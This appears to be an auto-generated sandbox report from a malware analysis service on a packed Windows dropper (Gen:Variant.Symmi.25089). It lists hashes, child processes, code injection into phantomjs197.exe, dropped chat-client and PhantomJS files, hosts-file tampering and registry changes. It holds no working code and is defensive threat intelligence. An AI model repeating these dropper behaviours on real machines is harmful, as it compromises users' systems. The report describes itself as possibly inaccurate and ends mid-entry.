Gen.Variant.Symmi.25089_9f9a67c663 – Adaware

Susp_Dropper (Kaspersky), Gen:Variant.Symmi.25089 (B) (Emsisoft), Gen:Variant.Symmi.25089 (AdAware), mzpefinder_pcap_file.YR (Lavasoft MAS)Behaviour:

The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Summary

MD5: 9f9a67c6638e9dfd444546f658cb0529

SHA1: 58d3f0ee5722ea8adee1933f892cdb7e4203efa8

SHA256: a9a664067c41ad88b63aff34d28beaa28cdeb668607de5d60e302c4d89e099a1

SSDeep: 12288:T7BNWXW2/Br4O0UhJy8WotreJLskbz6yXT26HuYZvpekyY1l6bG68Syg:T7BMXW2/GO065eJhWKT2GvQkyAYq6

Size: 810496 bytes

File type: EXE

Platform: WIN32

Entropy: Packed

PEID: UPolyXv05_v6

Company: no certificate found

Created at: 2014-04-16 00:18:31

Analyzed on: WindowsXP SP3 32-bit

Summary:

Dynamic Analysis

Payload

No specific payload has been found.

Process activity

The Malware creates the following process(es):

win32mrocli2.exe:428
%original file name%.exe:1256
purple.exe:2604
unzip.exe:2576
unzip.exe:6116
unovkkdak.exe:4740
unovkkdak.exe:3644
eityzygishyx.exe:564
eityzygishyx.exe:4936
glhljywourzj.exe:2816
glhljywapnzj.exe:4856
glhljywapnzj.exe:4708
glhljyvzcczjsznjntrz.exe:2508
glhljywpp4zj.exe:3992
glhljyw1jczj.exe:5872

The Malware injects its code into the following process(es):

phantomjs197.exe:1664

File activity

The process %original file name%.exe:1256 makes changes in the file system.

The Malware creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\glhljyvzcczjsznjntrz.exe (3883 bytes)
%System%\mqyitew\tst (10 bytes)

The Malware deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\glhljyvzcczjsznjntrz.exe (0 bytes)

The process purple.exe:2604 makes changes in the file system.

The Malware creates and/or writes to the following file(s):

C:\dev\null\icons\24e5b564d56b4d1796b0dc4344959e47b69727e2.jpg.save (5 bytes)
C:\dev\null\icons\44fc67967f917b10ff19f38897c1bbd2d6ff2e35.jpg.save (5 bytes)
C:\dev\null\icons\583b4a20a047387492f6d590b5b9dde3f21c37fb.jpg.save (5 bytes)
C:\dev\null\icons\a8666123c3b28dcc219d1b77977b6b117925151b.jpg.save (5 bytes)
C:\dev\null\icons\38b72e51556edcd947566844b29968c385bfbc8b.jpg.save (5 bytes)
C:\dev\null\icons\245845f77a47c462b516fe16a04f4c2bca53f2af.jpg.save (5 bytes)
C:\dev\null\icons\b5e697d54a2a949708cb36ca28de44e15d94b77e.jpg.save (5 bytes)
C:\dev\null\icons\9235f133902a2e5a8c903257f30a33a9081eabc3.jpg.save (5 bytes)
C:\dev\null\icons\c11fa36622ea7c9801e8a7f1f8edbb090710860c.jpg.save (5 bytes)
C:\dev\null\icons\6f5c34656ae889d3a4be5752bac2ba158d914d30.jpg.save (5 bytes)
C:\dev\null\icons\d94f5c277f5a1bde18e7fb091adf4a691c0899e5.jpg.save (5 bytes)
C:\dev\null\icons\b688b8627d9ad1860fdd92f5b945854c0296c84e.jpg.save (5 bytes)
C:\dev\null\icons\666817ac7e958c3f00849b37a7331edb26e145ec.jpg.save (5 bytes)
C:\dev\null\icons\bd04b63ac46de0e663dbe85fde1c7e47ce3ff7f1.jpg.save (5 bytes)
C:\dev\null\icons\b76dbec37693329ba77eb18e79b39fb5fbf3054d.jpg.save (5 bytes)
C:\dev\null\icons\e6f6bbd5fafb7ff340f15ff6b3abc8caf850e315.jpg.save (5 bytes)
C:\dev\null\icons\d0c441ce203a51a3bae938018df3e5008a410d30.jpg.save (5 bytes)
C:\dev\null\icons\11e318a152e6529bbc35d7d9162e9c9aadad2ef0.jpg.save (5 bytes)
C:\dev\null\icons\3b76e70d5ed8690323495fb5524d677b5c609400.jpg.save (5 bytes)
C:\dev\null\icons\4553ab0ce0319aba787e20b0d556851615ccbb70.jpg.save (5 bytes)
C:\dev\null\icons\15e6a4765f6b8cce43698383bb17cfd498e02a0b.jpg.save (5 bytes)
C:\dev\null\icons\eaf0d8fd1743714599baf123924e6d3ac059156e.jpg.save (5 bytes)
C:\dev\null\icons\e341afabfc4d58e582d78a533eddb486d2f30ffc.jpg.save (5 bytes)
C:\dev\null\icons\8506be1381a997df1dc523e7b482ec01f38a4379.jpg.save (5 bytes)
C:\dev\null\icons\2c423a99e263dc28037c9fc1e8e84832ab2de9e3.jpg.save (5 bytes)
C:\dev\null\icons\5f210f8347bcd25e6f25ecc6247a7289a1d4f55c.jpg.save (5 bytes)
C:\dev\null\icons\25362109a4500f4c90538040e1231fcc629b3c8d.jpg.save (5 bytes)
C:\dev\null\icons\3da8e0656812f00e88ee3778e7770a849087c87b.jpg.save (5 bytes)
C:\dev\null\icons\2773de6db6f0bf389a1894aad4acf386d408f494.jpg.save (5 bytes)
C:\dev\null\icons\48b91aab153f9ffe7879a1cc6d89bbe6e083f7a0.jpg.save (5 bytes)
C:\dev\null\icons\913bc246c1791e69842270061dd6d042960dc94d.jpg.save (5 bytes)
C:\dev\null\icons\3784219f65e8d4e36cd26cde04e8821f423197e1.jpg.save (5 bytes)
C:\dev\null\icons\eaab6294c2c71677224bacb89dc712dcfaf5855e.jpg.save (5 bytes)
C:\dev\null\icons\301fc70c8fbd2a3017832c5c169bf2d324f3da7e.jpg.save (5 bytes)
C:\dev\null\icons\6d035cbf152f2f323826bc48cc9ed6edee5a5610.jpg.save (5 bytes)
C:\dev\null\icons\2d5f2725aeeb39d2b73fba914d1eaa5024119005.jpg.save (5 bytes)
C:\dev\null\icons\69a339461c86da40f494ed26abc1d12ff1f4fab5.jpg.save (5 bytes)
C:\dev\null\icons\63c0dab3c8b04b979ff8f4a9f29bd2286abc8c2c.jpg.save (5 bytes)
C:\dev\null\icons\277550b871fd84f39688ce0ae7e82f34d78f5db7.jpg.save (5 bytes)
C:\dev\null\icons\8aa806930ad4ca4a5ec3427c5796fbe91ee71f22.jpg.save (5 bytes)
C:\dev\null\icons\fec20686ac06dfd471656ea58f759f8ad50252b6.jpg.save (5 bytes)
C:\dev\null\icons\ca839c923b09a03377ccb1ff62af53ce474c9f76.jpg.save (5 bytes)
C:\dev\null\icons\152b17fd93e6588aae66c35eac8b90ceae152474.jpg.save (5 bytes)
C:\dev\null\icons\8a5ecd76a959529f6edfa0bc3d746f226de3cc1c.jpg.save (5 bytes)
C:\dev\null\icons\c626735a7764616e285ab8651240ddf7c227deff.jpg.save (5 bytes)
C:\dev\null\icons\d09c11dea18d4f26421157d9817b6a78333d421d.jpg.save (5 bytes)
C:\dev\null\icons\7a037474380e10e4114d34df27c7f719750f26b6.jpg.save (5 bytes)
C:\dev\null\icons\badeaad5b386acf782d712f79c2eaede1898fe8f.jpg.save (5 bytes)
C:\dev\null\icons\f92d9cd8314e6fd1ad6eac6baecb696abea59469.jpg.save (5 bytes)
C:\dev\null\icons\6c2add77cd1b32e41657342a1aa9c844bd68acd5.jpg.save (5 bytes)
C:\dev\null\accounts.xml.save (146 bytes)
C:\dev\null\icons\61bd633e8348cd7cda6332f0091b364fd1304228.jpg.save (5 bytes)
C:\dev\null\icons\41b3ad01aeabfff74efb3c00f8a6ef3c64d31f68.jpg.save (5 bytes)
C:\dev\null\icons\a51994902670d9aa461d0bcaf28104b8ff6d5f59.jpg.save (5 bytes)
C:\dev\null\icons\d5da8b1fd7bd631465419dbbce8358dfa2cb4abb.jpg.save (5 bytes)
C:\dev\null\icons\669ffde9f8d3aab3b99868ed8305d5251acf568b.jpg.save (5 bytes)
C:\dev\null\icons\59d0afc10817f666da61599f4ebae157b71b282a.jpg.save (5 bytes)
C:\dev\null\icons\6e8e61003aa3ea022af6aa587fa86776d3110c19.jpg.save (5 bytes)
C:\dev\null\icons\0629957ac0ac3c0984da13d12c9400ebdb01a4b2.jpg.save (5 bytes)
C:\dev\null\icons\23b81f9bc63ab275622657cd877dd9db2fbe451b.jpg.save (5 bytes)
C:\dev\null\icons\e27f4a709a4b91cd310cc12839c97b599d04443b.jpg.save (5 bytes)
C:\dev\null\icons\f0d7fdd2430fe14fe3b9936a81ecad86cc3b0d23.jpg.save (5 bytes)
C:\dev\null\icons\f2cc26fa05bcef7f833e02fde24fd44a5574e012.jpg.save (5 bytes)
C:\dev\null\status.xml.save (551 bytes)
C:\dev\null\icons\e6ba4580705b7614e6fc310ca2749c2c59557807.jpg.save (5 bytes)
C:\dev\null\icons\f95c1c6eb5593c9cb5589d267df1657a3d18cdc8.jpg.save (5 bytes)
C:\dev\null\icons\005fbc4b3cb146c8098badbc3e3c5c4516a2b2a0.jpg.save (5 bytes)
C:\dev\null\icons\3176e5c56e4007d4cec15d3e5ee7b3c05fc9d821.jpg.save (5 bytes)
C:\dev\null\icons\a797b30b4a519f36a19f4efcb662b555a42b77a9.jpg.save (5 bytes)
C:\dev\null\icons\1c197f09c6aa1ebc5f130a8cf5cc0721e8274160.jpg.save (5 bytes)
C:\dev\null\icons\7aaa0c3cef3bc52936bbf26f69d122a8531a4fdc.jpg.save (5 bytes)
C:\dev\null\icons\1d060cc267b0bdee1db9bf7e3b70db40fb2a1d1d.jpg.save (5 bytes)
C:\dev\null\icons\b85e74b2e16b150fc74c04bea72846d5ba861120.jpg.save (5 bytes)
C:\dev\null\icons\c51f62632c285d604506115f2488a8c529d86fff.jpg.save (5 bytes)
C:\dev\null\icons\d0043e0612cc62d10f3e56ff5605b97151fba2e2.jpg.save (5 bytes)
C:\dev\null\icons\c447baccbb86131f8b7f06455e5f784e7406875c.jpg.save (5 bytes)
C:\dev\null\icons\6f7a8a326b4d3ef245fab3019e730495bfa4b3ff.jpg.save (5 bytes)
C:\dev\null\icons\50ab434275cfb714e30f4ae6807d2d48e901f456.jpg.save (5 bytes)
C:\dev\null\icons\fcc65c34ab46530603387dc2b0cf203986424778.jpg.save (5 bytes)
C:\dev\null\icons\f86c0968b55852aff6fdb8134b83348477d205db.jpg.save (5 bytes)
C:\dev\null\icons\4806483986e60cad969a1707422a715d42f62161.jpg.save (5 bytes)
C:\dev\null\icons\e864caf001491035549485ec0ab163423e69da96.jpg.save (5 bytes)
C:\dev\null\icons\144ae9548d5b8c728a7d193cbad0e82270db5f59.jpg.save (5 bytes)
C:\dev\null\icons\73e1fa4cea1e684f9668a17985d5b3dab2447835.jpg.save (5 bytes)
C:\dev\null\icons\0aa6c2e449161c0e0f99b36cea819d0558926a91.jpg.save (5 bytes)
C:\dev\null\icons\b15a27be277dab59ec28552586bb2dd6ca6ccee7.jpg.save (5 bytes)
C:\dev\null\icons\e9adfad40f833f7762653ec212ec103c9f600f39.jpg.save (5 bytes)
C:\dev\null\icons\ab57c70dc1e997465b1a9b3211788914b7a19e96.jpg.save (5 bytes)
C:\dev\null\icons\c44004785c10a859dabfb2c9367cae0ffb703bf7.jpg.save (5 bytes)
C:\dev\null\icons\672f241bea6963a36dd5695b5fe3f4629376c0da.jpg.save (5 bytes)
C:\dev\null\icons\d6056b785ebc7f8b537ff356fd1ddcac0110bb1b.jpg.save (5 bytes)
C:\dev\null\icons\8c05df51218481539fe6057b6d3b389910492221.jpg.save (5 bytes)
C:\dev\null\icons\252a56b4ea1b746fcfee080190c17ea3427d84ab.jpg.save (5 bytes)
C:\dev\null\icons\485071ec7068eb6f1d0e5bea1128578b2c269adb.jpg.save (5 bytes)
C:\dev\null\icons\568310ec88a22903677e41668bf713d42201a7e3.jpg.save (5 bytes)
C:\dev\null\icons\bc44b5c3afd27ce45f8d3ff33a8ff00a67aa7be4.jpg.save (5 bytes)
C:\dev\null\icons\35c8f63338d1d8b3e105821ff6c073bc7e32c64b.jpg.save (5 bytes)
C:\dev\null\icons\bded82350b81a88f29535b3d2ff7f1d3174d0f62.jpg.save (5 bytes)
C:\dev\null\icons\6238f7b1beda6f61518a73109b44b1b4850cb076.jpg.save (5 bytes)
C:\dev\null\icons\4de41723633eaee5dbfdd3b81ab99d893ad5af5e.jpg.save (5 bytes)
C:\dev\null\icons\4c5abdf6fc4709a31250ed9282231dd73e53cb78.jpg.save (5 bytes)
C:\dev\null\icons\4c0acdeac39c421dfc981f9b5c3772ba7afef119.jpg.save (5 bytes)
C:\dev\null\certificates\x509\tls_peers\chat.facebook.com.save (5 bytes)
C:\dev\null\icons\1de34f64317b2abc9608e23df1dd6effb39a4d2d.jpg.save (5 bytes)
C:\dev\null\icons\b621750e66296ac0ea0dd7e7e50be53052cf1471.jpg.save (5 bytes)
C:\dev\null\icons\4fee2f853ee309b79a35c76650633a0ba58525b6.jpg.save (5 bytes)
C:\dev\null\icons\dab66afc9f14e3adb4b64533857fdd9c5d33cd0f.jpg.save (5 bytes)
C:\dev\null\icons\ac421f7a9c547c27c45627d1558c728621ab5df2.jpg.save (5 bytes)
C:\dev\null\icons\42fdc32270a1fd5a75143f4dd1556f2e96f74e7e.jpg.save (5 bytes)
C:\dev\null\icons\feb5bbd7f1ec2e48aa8bd9850279953f3cb8ff15.jpg.save (5 bytes)
C:\dev\null\icons\6b756679fda59cc6d3d320331e2e807e2e8034c4.jpg.save (5 bytes)
C:\dev\null\icons\2657185809fd100acc7077ef5ee905ed203b6bd2.jpg.save (5 bytes)
C:\dev\null\icons\b51bc5756e0f731155ee5826c634b66f611869be.jpg.save (5 bytes)
C:\dev\null\icons\d5da23a964bb94cdf1e0a47958c2e3e28274188a.jpg.save (5 bytes)
C:\dev\null\prefs.xml.save (7 bytes)
C:\dev\null\icons\3e63dcb89b4bc7d919bef1ef173908160712d926.jpg.save (5 bytes)
C:\dev\null\icons\0c9c6d01b7a9d095ccfcd1be369a914a09a4d6ca.jpg.save (5 bytes)
C:\dev\null\icons\71c42a9b04d4a6da914f77d0b0d6159dfc908582.jpg.save (5 bytes)
C:\dev\null\icons\a3d9268f0017c757b0fd28b53330fa36c49f2922.jpg.save (5 bytes)
C:\dev\null\icons\1d8a79b8deb9b1da5151f84490811142a3b33821.jpg.save (5 bytes)
C:\dev\null\icons\e72f15737758a50dc5b32ea4814411d9cf9c5454.jpg.save (5 bytes)
C:\dev\null\icons\f198472c67b151b158fb3dc895b69b66a9f72cdc.jpg.save (5 bytes)
C:\dev\null\icons\af79198bd964f03af2cf2dba4501d0750222d39c.jpg.save (5 bytes)
C:\dev\null\icons\3e017c5887de83134844c5987061bf0b59dd1fac.jpg.save (5 bytes)
C:\dev\null\icons\2bb6cad6d70c366fc0f207c411de48be190aafd3.jpg.save (5 bytes)
C:\dev\null\icons\bffa03620c634a5072f35a696bde7b15e1be170d.jpg.save (5 bytes)
C:\dev\null\icons\b1aa85b50bc38e97e673896a151287a5cc173d1d.jpg.save (5 bytes)
C:\dev\null\icons\7a367f364e432fea2fda687e66b21fe765938c9b.jpg.save (5 bytes)
C:\dev\null\icons\2662e11f4c739960de346f1b4a2ed159d5e2ab63.jpg.save (5 bytes)
C:\dev\null\icons\9e6c49c2ab23a89ea699f598a8c2539a2ce64c8c.jpg.save (5 bytes)
C:\dev\null\icons\3220b53edceccc88455498a6044922043fca8ad0.jpg.save (5 bytes)
C:\dev\null\icons\80105ce1d710b5e8db09b7979e2bdf81d129dd4a.jpg.save (5 bytes)
C:\dev\null\icons\395523545d38ccdf1bab7e03c8b5f3973c465f4d.jpg.save (5 bytes)
C:\dev\null\icons\fd5de0b5b5bc0c9db46898396c7c181cb5ed27dd.jpg.save (5 bytes)
C:\dev\null\icons\3c0120a98c4d6ae8d19fd4946c9addba294623a3.jpg.save (5 bytes)
C:\dev\null\icons\491ef8c5b8a22eeaa4a6c764f58a82b572063458.jpg.save (5 bytes)
C:\dev\null\icons\fda508ec035ed8be377a4e2d47d86c62d470c56d.jpg.save (5 bytes)
C:\dev\null\icons\ab0d22e02b11e53efe3533b906f55f612c933a64.jpg.save (5 bytes)
C:\dev\null\icons\31343e6619f34d02e94bef801548cf2a2e5058e4.jpg.save (5 bytes)
C:\dev\null\icons\1b58d9794274c7d75a1f0c8544ff7aa0e33256a0.jpg.save (5 bytes)
C:\dev\null\icons\2eaed5d088ced02f68e9e8db0755425b720c06a2.jpg.save (5 bytes)
C:\dev\null\icons\448dd396dac3de51a031b53270a89860afbe2508.jpg.save (5 bytes)
C:\dev\null\icons\70b8caba98bc624353433293dec0ca0d9dec5761.jpg.save (5 bytes)
C:\dev\null\icons\1ba35261202e2f87d9c312fbd792c55f662b8819.jpg.save (5 bytes)
C:\dev\null\icons\ebcb620b4604a59882f68714f2f32f11e42eeb5d.jpg.save (5 bytes)
C:\dev\null\icons\f75ecd3b906820a93d1cab5eddc3a89f7a2656b3.jpg.save (5 bytes)
C:\dev\null\icons\341afa921fc8402bd996cb690276976ed8acb5de.jpg.save (5 bytes)
C:\dev\null\icons\b98c1dcd1c8eb63e0557335f3ceb63d3e37e86a0.jpg.save (5 bytes)
C:\dev\null\icons\9f30caf38edc13cf99865a136b1d8a924983e9ab.jpg.save (5 bytes)
C:\dev\null\icons\92c02ea9a72036e3d437c6e1ea5e49ba0f467178.jpg.save (5 bytes)
C:\dev\null\icons\640c645551a704c54eff18836b7eae8ee0da0975.jpg.save (5 bytes)
C:\dev\null\icons\33ac15b05076bdc29117a7e7e072364626bcb7d5.jpg.save (5 bytes)
C:\dev\null\icons\dab069465fa334a7dbf839bc1b41e86e78ab97a0.jpg.save (5 bytes)
C:\dev\null\icons\4b870ba980703bb14fceb9f0970c66a97433060e.jpg.save (5 bytes)
C:\dev\null\icons\8b1a6971a8965fa993cbbe9f82a75322ccbdf3e7.jpg.save (5 bytes)
C:\dev\null\icons\18199163eecf1b7312ebcacd2ba8828cf04e2d27.jpg.save (5 bytes)
C:\dev\null\icons\2c8b0c86518a24fef9f6cf169713769d07fc4a47.jpg.save (5 bytes)
C:\dev\null\icons\d2b14958b1c462c9a453bd55d58413e1fa7506f8.jpg.save (5 bytes)
C:\dev\null\icons\8981eeb38add7f1fb59159d8cd14a69bfde94add.jpg.save (5 bytes)
C:\dev\null\icons\bdc26f85f6f911c631eb430af63385e92f7e63cc.jpg.save (5 bytes)
C:\dev\null\icons\17e83ae90356598435c2b10f836eb38d81c68b97.jpg.save (5 bytes)
C:\dev\null\icons\83a02ccc9667e6de04d506e1943699dae7038ffc.jpg.save (5 bytes)
C:\dev\null\icons\3d2e363d935d1dbb5dda889958207316d899bd2b.jpg.save (5 bytes)
C:\dev\null\icons\c6b99d22efe0c3d8b6975491077d1cf045aa35a2.jpg.save (5 bytes)
C:\dev\null\icons\2f26a8a25c51902edbe0b30f5ff669fd8ce47b6f.jpg.save (5 bytes)
C:\dev\null\icons\ef672920e507926187f15453894c8e65eb57a6e2.jpg.save (5 bytes)
C:\dev\null\icons\df706e4466ff63060bfe2817e250cb182458532c.jpg.save (5 bytes)
C:\dev\null\icons\06786df37768a4b1442258546b1cc8a25b9c1002.jpg.save (5 bytes)
C:\dev\null\icons\b060fb7221dbe24840e631a53de9c0c0b10b0307.jpg.save (5 bytes)
C:\dev\null\icons\1c697641b354de15eacffed0bd38c7287eb1da96.jpg.save (5 bytes)

The process unzip.exe:2576 makes changes in the file system.

The Malware creates and/or writes to the following file(s):

%System%\mqyitew\purple\nssutil3.dll (601 bytes)
%System%\mqyitew\purple\ca-certs\AddTrust_External_Root.pem (1 bytes)
%System%\mqyitew\purple\libpurple.dll (5873 bytes)
%System%\mqyitew\purple\ssl3.dll (1281 bytes)
%System%\mqyitew\purple\intl.dll (601 bytes)
%System%\mqyitew\purple\purple.exe (26 bytes)
%System%\mqyitew\purple\libnspr4.dll (1281 bytes)
%System%\mqyitew\purple\smime3.dll (601 bytes)
%System%\mqyitew\purple\ca-certs\Entrust.net_2048.pem (1 bytes)
%System%\mqyitew\purple\ca-certs\Verisign_Class3_Primary_CA.pem (834 bytes)
%System%\mqyitew\purple\ca-certs\Microsoft_Internet_Authority_2010.pem (1 bytes)
%System%\mqyitew\purple\ca-certs\ValiCert_Class_2_VA.pem (1 bytes)
%System%\mqyitew\purple\plugins\xmppdisco.dll (44 bytes)
%System%\mqyitew\purple\sqlite3.dll (3073 bytes)
%System%\mqyitew\purple\plugins\libyahoo.dll (22 bytes)
%System%\mqyitew\purple\plugins\xmppconsole.dll (37 bytes)
%System%\mqyitew\purple\ca-certs\Entrust.net_Secure_Server_CA.pem (1 bytes)
%System%\mqyitew\purple\ca-certs\Microsoft_Secure_Server_Authority_2010.pem (2 bytes)
%System%\mqyitew\purple\sasl2\saslGSSAPI.dll (36 bytes)
%System%\mqyitew\purple\libgobject-2.0-0.dll (2105 bytes)
%System%\mqyitew\purple\ca-certs\StartCom_Certification_Authority.pem (2 bytes)
%System%\mqyitew\purple\ca-certs\VeriSign_Class_3_Public_Primary_Certification_Authority_-_G5.pem (1 bytes)
%System%\mqyitew\purple\sasl2\saslPLAIN.dll (601 bytes)
%System%\mqyitew\purple\ca-certs\AOL_Member_CA.pem (1 bytes)
%System%\mqyitew\purple\sasl2\saslCRAMMD5.dll (601 bytes)
%System%\mqyitew\purple\libssp-0.dll (36 bytes)
%System%\mqyitew\purple\ca-certs\DigiCertHighAssuranceEVRootCA.pem (1 bytes)
%System%\mqyitew\purple\libplds4.dll (14 bytes)
%System%\mqyitew\purple\ca-certs\Thawte_Primary_Root_CA.pem (1 bytes)
%System%\mqyitew\purple\libgmodule-2.0-0.dll (36 bytes)
%System%\mqyitew\purple\nss3.dll (5873 bytes)
%System%\mqyitew\purple\freebl3.dll (1425 bytes)
%System%\mqyitew\purple\ca-certs\Equifax_Secure_Global_eBusiness_CA-1.pem (964 bytes)
%System%\mqyitew\purple\libgcc_s_dw2-1.dll (601 bytes)
%System%\mqyitew\purple\ca-certs\CAcert_Root.pem (2 bytes)
%System%\mqyitew\purple\ca-certs\VeriSign_Class_3_Public_Primary_Certification_Authority_-_G5_2.pem (1 bytes)
%System%\mqyitew\purple\plugins\statenotify.dll (15 bytes)
%System%\mqyitew\purple\plugins\ssl-nss.dll (28 bytes)
%System%\mqyitew\purple\sasl2\saslDIGESTMD5.dll (673 bytes)
%System%\mqyitew\purple\libjabber.dll (2321 bytes)
%System%\mqyitew\purple\ca-certs\VeriSign_Class3_Extended_Validation_CA.pem (2 bytes)
%System%\mqyitew\purple\libplc4.dll (15 bytes)
%System%\mqyitew\purple\ca-certs\CAcert_Class3.pem (2 bytes)
%System%\mqyitew\purple\ca-certs\Baltimore_CyberTrust_Root.pem (1 bytes)
%System%\mqyitew\purple\ca-certs\Thawte_Premium_Server_CA.pem (1 bytes)
%System%\mqyitew\purple\ca-certs\DigiCertHighAssuranceCA-3.pem (2 bytes)
%System%\mqyitew\purple\zlib1.dll (673 bytes)
%System%\mqyitew\purple\libglib-2.0-0.dll (7726 bytes)
%System%\mqyitew\purple\ca-certs\America_Online_Root_Certification_Authority_1.pem (1 bytes)
%System%\mqyitew\purple\ca-certs\Deutsche_Telekom_Root_CA_2.pem (1 bytes)
%System%\mqyitew\purple\plugins\ssl.dll (12 bytes)
%System%\mqyitew\purple\plugins\libxmpp.dll (21 bytes)
%System%\mqyitew\purple\libxml2-2.dll (7971 bytes)
%System%\mqyitew\purple\ca-certs\VeriSign_Class_3_Public_Primary_Certification_Authority_-_G2.pem (1 bytes)
%System%\mqyitew\purple\libgthread-2.0-0.dll (44 bytes)
%System%\mqyitew\purple\softokn3.dll (673 bytes)
%System%\mqyitew\purple\ca-certs\Go_Daddy_Class_2_CA.pem (1 bytes)
%System%\mqyitew\purple\ca-certs\VeriSign_International_Server_Class_3_CA.pem (1 bytes)
%System%\mqyitew\purple\sasl2\saslLOGIN.dll (601 bytes)
%System%\mqyitew\purple\libsasl.dll (673 bytes)
%System%\mqyitew\purple\libymsg.dll (1281 bytes)
%System%\mqyitew\purple\ca-certs\Equifax_Secure_CA.pem (1 bytes)
%System%\mqyitew\purple\ca-certs\GTE_CyberTrust_Global_Root.pem (876 bytes)
%System%\mqyitew\purple\sasl2\saslANONYMOUS.dll (601 bytes)

The process unzip.exe:6116 makes changes in the file system.

The Malware creates and/or writes to the following file(s):

%System%\mqyitew\dropbox\package.json (767 bytes)
%System%\mqyitew\dropbox\googleTakeout.js (14 bytes)
%System%\mqyitew\dropbox\mouse.js (4 bytes)
%System%\mqyitew\dropbox\phantomjs197.exe (53130 bytes)
%System%\mqyitew\dropbox\querystring.js (5 bytes)
%System%\mqyitew\dropbox\casper.js (601 bytes)
%System%\mqyitew\dropbox\cli.js (5 bytes)
%System%\mqyitew\dropbox\pagestack.js (4 bytes)
%System%\mqyitew\dropbox\http.js (2 bytes)
%System%\mqyitew\dropbox\colorizer.js (4 bytes)
%System%\mqyitew\dropbox\bootstrap.js (14 bytes)
%System%\mqyitew\dropbox\events.js (8 bytes)
%System%\mqyitew\dropbox\tester.js (59 bytes)
%System%\mqyitew\dropbox\dropbox2.js (25 bytes)
%System%\mqyitew\dropbox\clientutils.js (35 bytes)
%System%\mqyitew\dropbox\utils.js (21 bytes)
%System%\mqyitew\dropbox\xunit.js (6 bytes)

The process unovkkdak.exe:4740 makes changes in the file system.

The Malware creates and/or writes to the following file(s):

%System%\mqyitew\tst (10 bytes)

The process unovkkdak.exe:3644 makes changes in the file system.

The Malware creates and/or writes to the following file(s):

%WinDir%\Temp\glhljywourzj.exe (5873 bytes)
%System%\unzip.exe (7100 bytes)
%System%\win64mrocli2.exe (76437 bytes)
%System%\mqyitew\purple\purple.zip (90422 bytes)
%System%\mqyitew\rng (152 bytes)
%WinDir%\Temp\glhljywg9qzj.exe (1940 bytes)
%System%\win32mrocli2.exe (27367 bytes)
%System%\mqyitew\tst (10 bytes)
%System%\drivers\etc\hosts (904 bytes)
%System%\mqyitew\run (10 bytes)
%System%\mqyitew\por (1 bytes)
%System%\mqyitew\ihst (226 bytes)
%WinDir%\Temp\glhljywapnzj.exe (35 bytes)
%WinDir%\Temp\glhljywpp4zj.exe (35 bytes)
%System%\mqyitew\dropbox\dropbox.zip (181699 bytes)
%System%\mqyitew\purple\zip.exe (10500 bytes)
%System%\win64mroaes2.exe (76437 bytes)
%System%\eityzygishyx.exe (5873 bytes)
%System%\mqyitew\cfg (659 bytes)
%System%\mqyitew\purple\exefile (14580 bytes)
%WinDir%\Temp\glhljyw1jczj.exe (35 bytes)

The Malware deletes the following file(s):

%WinDir%\Temp\glhljywg9qzj.exe (0 bytes)
%WinDir%\Temp\glhljywpp4zj.exe (0 bytes)
%WinDir%\Temp\glhljywapnzj.exe (0 bytes)
%WinDir%\Temp\glhljywourzj.exe (0 bytes)
%WinDir%\Temp\glhljyw1jczj.exe (0 bytes)

The process eityzygishyx.exe:564 makes changes in the file system.

The Malware creates and/or writes to the following file(s):

%System%\mqyitew\tst (10 bytes)

The process eityzygishyx.exe:4936 makes changes in the file system.

The Malware creates and/or writes to the following file(s):

%System%\mqyitew\tst (10 bytes)

The process glhljywourzj.exe:2816 makes changes in the file system.

The Malware creates and/or writes to the following file(s):

%System%\mqyitew\tst (10 bytes)

The process glhljyvzcczjsznjntrz.exe:2508 makes changes in the file system.

The Malware creates and/or writes to the following file(s):

%System%\unovkkdak.exe (5873 bytes)
%System%\mqyitew\etc (10 bytes)
%System%\mqyitew\tst (10 bytes)
%System%\drivers\etc\hosts (22 bytes)

The Malware deletes the following file(s):

%System%\drivers\etc\hosts (0 bytes)

Registry activity

The process win32mrocli2.exe:428 makes changes in the system registry.

The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "61 42 C4 94 38 EB 38 31 4D 99 8C 2C 55 3D 01 4A"

The process purple.exe:2604 makes changes in the system registry.

The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "96 C8 88 3A 88 6E FB E9 30 08 9B B1 94 7C C2 28"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

The process phantomjs197.exe:1664 makes changes in the system registry.

The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9A 55 34 F3 51 25 81 05 D4 FA 59 B0 82 A0 F5 9C"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\LocalService\Local Settings\Application Data"

The process unzip.exe:2576 makes changes in the system registry.

The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "21 53 A8 70 F7 D1 4A AC C5 BF 44 C5 34 E1 81 04"

The process unzip.exe:6116 makes changes in the system registry.

The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "46 FE D8 78 94 75 1C E4 41 01 0F 2D 60 8D E5 6C"

The process unovkkdak.exe:3644 makes changes in the system registry.

The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"DefaultConnectionSettings" = "3C 00 00 00 02 00 00 00 01 00 00 00 00 00 00 00"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
